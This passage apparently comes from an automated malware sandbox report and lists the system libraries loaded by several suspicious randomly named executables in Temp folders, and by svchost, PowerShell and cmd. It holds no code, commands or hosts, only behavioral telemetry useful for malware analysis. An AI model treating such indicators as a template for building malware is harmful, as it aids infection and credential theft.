                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: webio.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: webio.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: webio.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: schannel.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: mskeyprotect.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: ncryptsslp.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: msasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: gpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: dpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: wbemcomn.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: amsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeSection loaded: wtsapi32.dll
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeSection loaded: msi.dll
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeSection loaded: dbghelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeSection loaded: dbgcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeSection loaded: secur32.dll
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeSection loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winmm.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: edputil.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: appresolver.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: slc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: sppc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: apphelp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: webio.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: schannel.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: mskeyprotect.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: ncryptsslp.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: msasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: gpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: dpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: wbemcomn.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: amsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeSection loaded: apphelp.dll
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeSection loaded: windows.storage.dll
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeSection loaded: wldp.dll
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeSection loaded: cryptsp.dll
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeSection loaded: rsaenh.dll
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeSection loaded: cryptbase.dll
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeSection loaded: iphlpapi.dll
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\{ED8B0E24-294A-4924-ABF6-1B4F6433B770}\cls.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\{ED8B0E24-294A-4924-ABF6-1B4F6433B770}\cls.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\{ED8B0E24-294A-4924-ABF6-1B4F6433B770}\cls.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\{ED8B0E24-294A-4924-ABF6-1B4F6433B770}\cls.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
